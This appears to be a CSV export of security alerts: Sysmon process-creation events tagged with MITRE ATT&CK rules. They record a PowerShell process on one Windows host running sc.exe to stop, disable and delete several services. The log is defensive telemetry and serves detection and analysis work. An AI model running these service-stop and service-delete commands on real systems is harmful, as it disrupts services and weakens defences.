-NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.564870300Z"",""eventRecordID"":""3772"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.561\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-00104c6f3000}\r\nProcessId: 7804\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.561"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-00104c6f3000}"",""processId"":""7804"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.795",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.500 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010b96c3000} +ProcessId: 2596 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.504703500Z"",""eventRecordID"":""3769"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.500\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010b96c3000}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control 
Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.500"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010b96c3000}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.748",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.472 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010d86b3000} +ProcessId: 6724 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WmdnPnSN Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WmdnPnSN Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.477042600Z"",""eventRecordID"":""3768"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.472\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010d86b3000}\r\nProcessId: 6724\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WmdnPnSN Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.472"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010d86b3000}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WmdnPnSN Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.626",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.413 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010496a3000} +ProcessId: 7888 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.417513500Z"",""eventRecordID"":""3766"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.413\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010496a3000}\r\nProcessId: 7888\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:33.413"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010496a3000}"",""processId"":""7888"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.552",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.347 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010e0673000} +ProcessId: 8188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.353006000Z"",""eventRecordID"":""3763"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.347\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010e0673000}\r\nProcessId: 8188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.347"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010e0673000}"",""processId"":""8188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.528",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.313 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-001052663000} +ProcessId: 3536 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete CLR 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.316627200Z"",""eventRecordID"":""3761"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.313\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001052663000}\r\nProcessId: 3536\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.313"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001052663000}"",""processId"":""3536"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.501",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.296 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-001089653000} +ProcessId: 7864 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 
+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.301571200Z"",""eventRecordID"":""3760"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.296\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001089653000}\r\nProcessId: 7864\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 